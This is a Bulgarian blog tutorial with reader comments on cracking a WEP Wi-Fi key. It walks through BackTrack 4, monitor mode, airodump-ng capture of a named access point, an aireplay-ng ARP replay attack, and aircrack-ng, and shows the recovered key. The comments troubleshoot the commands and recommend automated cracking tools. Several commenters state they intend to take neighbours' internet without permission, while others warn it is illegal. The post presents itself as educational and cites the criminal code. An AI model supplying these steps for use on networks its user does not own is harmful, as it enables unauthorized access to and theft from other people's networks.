Тук ще демонстрирам как се декодира ключ от wireless мрежа с кодиране WEP. Правя този видео материал защото много отдавна очаквах някои да сподели тази демонстрация в нашето българско интернет пространство, но уви никои не го направи.
Тук ще опиша как можем да вземем ключа на wireless мрежа с WEP кодиране.
За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея ifconfig,iwconfig,airodump, aireplay и aircrack.
След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг
# iwconfig wlan0 mode monitoring;
След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел
# airodump-ng wlan0
Понеже търсим wireless със WEP кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.
След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем airodump за да събирем информация за съответната мрежа.
# airodump-ng -w wep -c 6 --bssid 00:23:CD:D7:84:FC wlan0 (postoqnno raboti)
Сега ще отворим още един терминал в които ще използваме ARP Reply attack за да увеличим броя на дейта пакетите и да вземем инициализиращите вектори или IV на избраният по- рано Access Point.
# aireplay-ng -3 -b 00:23:CD:D7:84:FC wlan0
Оставяме aireplay пуснат и наблюдаваме Терминал 1. За да имаме успеваемост на разбиване на ключа е необходимо да съберем над 20 000 дейта пакети, след което ще прекратим airodump-ng и aireplay-ng.
След като събрахме над 22 000 дейта пакети прекратяваме airodump с Контрол и C и aireplay с Контрол и C
Сега имаме всичко необходимо за да декодираме ключа на wireless мрежата "mpetrov_net" като използваме aircrack за целта.
aircrack-ng wep-03.cap
Тук виждаме, че ключът е 9781238761 и е кракнат със 100% успеваемост.
Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.
Видео материал във vbox7.com: Разбиване на Wireless с encoding Wep
Видео материал във youtube.com: Разбиване на Wireless с encoding Wep
Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:
Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.
Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.
Разбиване на Wireless с WEP encoding,
Здравейте,
при мен всичко е ок, но не мога да разкрия ключа. Когато стигна до последната стъпка ми казва, че не съществува в речникът. Аз ли греша, дайте малко помощ.
Значи проблема може да е следният,когато правите
airodump-ng -w wep -c (kanal) --bssid (paste macca) wlan0
за тази мрежа се създава фаил wep-o1.cap ,и трябва накрая да пишете
aircrack-ng wep-01.cap
ako пуснете втори път да сканира с друг bssid се създава фаил wep-02.cap,и се пише
aircrack-ng wep-02.cap ,
и така за всяка следваща мрежа,защото не всеки път става събирането на дата пакети.
Аз лично вместо wep създавам фаил с името на мрежата за да не се чудя накрая кои cap. фаил да краквам и по точно ако краквам мрежа с име belkin_wifi пиша
airodump-ng -w belkin_wifi -c (kanal) --bssid (paste macca) wlan0
и накрая
aircrack-ng belkin_wifi-01.cap
Здравейте момчета!
Хубаво си правите експерименти. Интересно е! Аз също "държа клавиатура" в ръцете си вече 22 години, но не мога да ви разбера. За 20 лева на месец (тасата за интернета), ако някой комшия се усети, такъв пердах може да отнесете…. И не само пердах!
Здравейте.Аз съм със клиентско устройство на покрива,виждам над 30 мрежи около мен, та с него ще мога ли да хакна някой.
Прав си да, дори може и повече от пердах :). Да не говорим, че доста тарифи са и за 10 лв. Лично моята идея е да се демонстрира сигурността и как да се защитим това е :)
Админе не ми отговори,или само с безжична карта става
До някъде си прав,ако се намираш в България,обаче аз 3 години плаштах по 45 евро на месец и то за някакъв смешен интернет--6 Mbits / 256 kbits, и на края искаха да вдигат таксата,когато и казах да вървят на майната си.,С тези 256 Kbits (около 40 КB в сек.) дето ми дават пращам едно архивче със снимки за няколко часа,така че проблема не е в 10-20 лева а в това какво получаваме срещу парите си
пичове от доста време си играя с back track и стигнах до извода че доста интересно и забавно но ако някой от вас го ползва само за да разбива WEP мрежи препорачвам ви minidwep. това е програма за линукс ( back track също става) изтегляте я инсталиратея и тя ви извършва вси4ки тези команди кадето ги пишете ( сиреч интерфеис)
Но идва проблема че да я инсталирате трябва да имате back track 4 Persistent Changes. Няма да обеснявам какво е Persistent Changes. Предполагам че мноого интересуващите се знаят какво е.
кажете нещо и за windows някоя програмка за тези работи
Лично аз след две преинсталаций на виндоуса от такива програмки се отказах да си правя експерименти с него.ако пък толкова държиш на него ето разгледай тези торенти
http://nanoset.net/search/?search=++wifi&cat=0&x=17&y=2
Здравейте купих wifi с rtl8187 само зареди това, кракнах си мрежата дадено ми е че всичко е ок но никаде не си виждам паролата?!?
"aircrack-ng wep-03.cap
Тук виждаме, че ключът е 9781238761 и е кракнат със 100% успеваемост."
Мда но къде Мартине видя именно че ключът е този аз моя не го виждам никъде???
Благодаря предварително.
Еи аз не съм я кракнал сега забелязах искаше ми повече пакети като понасъбрах малко повече и си разбих паролата и ми я показа явно защото е била мааалко по-сложна и защото бе с 128 битово криптиране както и да е сега се фащам да направя същото ама с wpa макар че там ми се струва твърде просто понеже като си вкарам паролата в речника всичко ще е …..
Ей благодаря определено никога нема да ползвам wep :D
При мен откривам 4 5 wep мрежи и поне толкова wpa …. Пробвам и по двата начина …..всичко си става така както е в клипчето само дето парола не може да разкодира :) може би сичките 10 мрежи да са с някви по завартяни пароли а не само букви или цифри което наблюдавам в всичките тестови клипчета …….. до сега успех нямам иначе е доста полезно :)
ei momcheta kak moga da istaliram baktrak4 is kakva programa se otvaria faila veche 2 pati go teglia i nemoga da go istaliram a ko niakoi znae kak neka mi pmogni che tuk v kipar e dosta skapichak neta
tozi fail backtrack,se zapisva na "live CD" restartira6 kompa,i ti tragva backtracka
Mom4eta i momi4eta ne si pravete truda da kradete internet!Ot li4en opit vi kazvam hvanaha me predi godina bqh golemiq pi4 koito ne pla6ta6e internet bqh na kosum ot globa i zatvor razmina mi se s malko boi po tikvata i nqkolko zaplahi za s4upeni kokali!No ot togava ve4e ne pravq takiva ne6ta zatova po dobre daite tam 20 lv i si znaite 4e vsi4ko e nared i e zakonno!
Zdraveite!Preporu4vam na vsi4ki da se otkajat ot hakvaneto i da otidat do nai blizkiq Internet dostav4ik i da si pusnat Internet kato beli hora!
izliza mi 4e ne moje da nameri wlan0
zashto ne stava probhai eth0 i dr. no ne stava
Как мога да увелича база-данните с ключове на aircrack-ng, понеже имам само 220 бр.
dobre svalih i instalirah toq black track no v papkata koqto instalirah mi vadi samo failove kak da go startiram kak da go otvora ne mi e qsno
zdr pak ako moje da mi kajete kak da go zapisha na live cd malko sam lamer no smqtam 4e shte uspeq da go podkaram toq black track i oshte pove4e da hack-na rutera si za proba
Сваляш имидж файла и го бърнваш като имидж. После вкарваш в прословутото ти сд, настройваш биос да буутва от сд, и рестартираш. Биоса ще те пита дали искаш да буутнеш от сд-то и това е.
Пишеш ifconfig -a и гледаш какво име е дадено на картата ти и чак тогава я пускаш в мониторинг мод.
Масово сега се използват пароли от по 20+ символа, което прави нещата доста по-трудни.
И най-важното, е че това трябва да се прави в `локална` среда, иначе боят, който ще изядете ще ви бъде най-малкия проблем, тъй като това си е криминално проявление.
poneje sam lamer bih se radval da se napravi neshto kato okazanie kak da pusna black track-a i na windows stava li tam kak se bootva itakiva raboti sajalqvam mnogo oshte vedn1j no pak kazvam lamer sam imam dosta wi fi mreji okolo mene a tezi koito ostanaha bes paroli mnoo slab net mi davat ako nqma da e problem na nqkoi da mu otnema malko cenno vreme moje i na skayp-a da mi pishete : marian_iko mersi predvaritelno
Като изпишеш iwconfig какво изход ти дава?
Здравейте!
За какво се обръщам към Вас:Записах програмата с "PowerIso",стартирам комп-а,излиза ми всичко,започвам процеса,изпълнявам както е описано(така мисля),но в краен случай след като стигна го aircrack Faled.Try next …. Така.От клипа виждам,че се отварят 2 терминала,а незнам как става това.След като използвам airodump,изчаквам го повече от 10 мин.,за да събере повече информация,спирам го с Ctr+C,продължавам с aireplay и след като е насъбрало повече от 20 000 пакети,го спирам и напред,но всичко това го правя в същия терминал.Да не би в това да е проблема?!
Ще ми е драго някой да ми даде съвет!Благодаря!
П.С.: Оставям Skype: bogobago
Здравейте! Аз съм с DELL WIRELESS 1390 WLAN базирана на BROADCOM адаптер и като се поразрових видях, че не става за packet injection, а само за monitor mode. Има ли смисъл да опитвам въобще?
mojeli nqkoi da mi dade link za back track 4 …. tursq go ve4e dva dena i nemoga da go namerq .
ще съм ви много благодарен ако някой ми даде линк за тази програма Back Track 4 никъде не мога да я намеря, благодаря предварително!
Здравей Мартин искам да попитам как да си настроя мрежата в iwconfig wlan0 mode monitoring когато сам под бактрак 4 нямам интернет а съм нов в тая област но бих искал да се науча чета всякакви форуми и прочие но не намирам отг. на вапросът си.Ако можеш да ми помогнеш ще ти бада много благодарен и ако може да е за супер начинаещи отг . Благодаря предварително .
Вижте сега,,,гледам задавате доста глупави въпроси,,на които можете сами да си отговорите,,нужно е само малко по внимателно да се загледате в клиповете,и да почетете,,в youtube.com ,е фрашкано с клипове за уеп,,гледам има вапрос "как да си инсталирам тази програма бактрак 4" затова и никои няма да ви отговири,,баси тапия вапрос,,,има клипове и демонстрации за всичко,,растаресете се вместо да занимавате хората с глупости,,,ето и мой личен клип който съм го направил днес:http://vbox7.com/play:9e8c3353
даже и с обяснения,,и аз отначало имах проблеми с на милен командите,,но се растарсих в тук таме и ето резултата http://vbox7.com/play:9e8c3353
На мене само ми е интересно как някой успява да намери някой друг, който му ползва безжичния интернет. Щото според мене е невъзможно, ама абсолютно невъзможно.
след като се "разглобих" да търся отговор на въпроса ми реших да се изложа ии да питам
защо не ми намира wlan след като съм с лаптоп и е вградена картата ;д като напиша iwconfig пише че нямам ли-фи :D
последната команда (aircrack-ng wep-03.cap) а в клипа е (
aircrack-ng wep-01.cap),коя по-точно.
събрах на 30 000 пакета и накрая aircrack-ng wep-03.cap и неми изкара паролата,а ми даде някаква грешка.
Дайте ми съвет какво трябва да направя на клипа прозореца е с 3 терминала и падащи менюта отгоре а на моя back track 4 не се пявяват и когато преминавам от една команда към друга преминавам с ctrl + c и навярно прекъсвам процеса защото като да последната команда cd / ми казва че няма фаил
Така и не ми стана ясно с каква команда отваряме повече от един терминал… Моля помогнете.
priqtel ti na kolko si godini za kakvo govorish ti lud v nekakav film si se vkaral ,az po princip ne im razbiram mn na tezi ama tuk kato vi gledam kvi ste bazlivci s golqmo udovolstvie bih se nau4il da hackna mrejite i sled tova vsi4ki komshii za dobre zapovqdali !!!
@Yavkoo
виж сега,,20000 пакета ти стигат да кракнеш парола от 5-6 синвола,,ониа ден попаднах на един рутер ,и когато стигнах на 60000 пакета бях сигурен че е мой,,но какво да видя: Try with 70000 IVs", Гледах като луд,,,продалжих да сабирам пакети,,и на 120000 кракна клуча,,който бе6е с 26 синвола,,,Та направи си сам сметките
И как точно могат да те хванат ако хакнеш нета на някой?
Здравей,Марти дай ми савет за бактрак 4 имам го работя с него но с WPA имам проблем имали програмата пакет със дисионарио някаде зада я дръпна или се теглят отделно винаги четя твоите статии и савети и знам много неща но все ояе съм наченаещ благодаря ти предварително……….
@Румен
кажи името на програмата не невалидни линкове
ako si v kipar ako ti triabva parola za cyta ili speedtouch ruteri mojesh dame potarsish nomera mi e 99234629
Abe imam problem sas startiraneto na blacktrack4 r2 nqma setup file s nqkva programa li se startira ili ako moje nqkoi da mi kaje plzzz
здравейте на всички…сигурен съм,че все още има хора интересуващи се от начините,с които могат да разкодират някоя налична интернет връзка.доста материал по тази тема има в интернет пространството.струва си да го направиш,ако ти излиза скъп нета.моят случай е такъв,спестявайки 20–40 евро на месец.но съм съгласен и с тези които коментират,че за 5-10 евро/в БГ мисля че толкова е нета/не си струва.но това зависи от човек…….както казах много са начините,да извадите код,на някое рутерче.но ви препоръчвам една програмка BEINI 1.2.1 ako я разучите,ще видите за колко кратко време вади кодовете,най вече с WEP криптиране.успех ,и не злоупотребявайте.
vsi4ko raboti perfekto daje si razbih i mreja samo deto mnogo bavno stava mnogo bavno mi sabira DATA za6to stava taka
Дет се казва…евала за статията!!! Мн добре си описал и обяснил работата с BackTrack.
Аз обаче имам един проблем -- немога да си отвора 3 прозореца с backtrack. По принцип компа ми е с XP и зареждам backtrack с VirtualBox….ако можеш кажи ми някакъв начин за отстраняване на "проблема".
БЛАГОДАРЯ ПРЕДВАРИТЕЛНО!!!!!! :)
Niamam kirilica.6te me izvinite. Tazi programa BEINI 1.2.1 pod Linuks li raboti ?
BEINI 1.2.1 , е на основата на LINUKS.записваш iso файла на диск,или на флашка/както прецениш/.рестартираш компа и посочваш в bios от каде да зареди……Boqn-e проблемът в трети прозорец с bactrack,или стартирането на aircrack-ng.може би е в това,че не посочваш правилно файл .cap пробвай следния начин
aircrack-ng -z -b/BSSID/ test*.cap зависи как си маименовал .cap ,дано си ме разбрал :)
Здр Мартине,
Нов съм в занаята с разбиването на мрежи.Следвах инструкциите ти за BT 4( за WAP).
Откривам някакви пароли,но не са верни????
Опитах и с моята мрежа и програмата ми даде грешна парола(8 сивола), a моите са повечко!!!
Четох ,че се ползват някакви речници за 'уцелване' на паролата.Е?
Дай съвет PLS!!!!
Жив и Здрав
АНДРО
butni v biosa buton f12 za da moje kato restartira6 da butva ot dvd to tragva samo na linux za windols trabva da butne6 f 12 ot biosa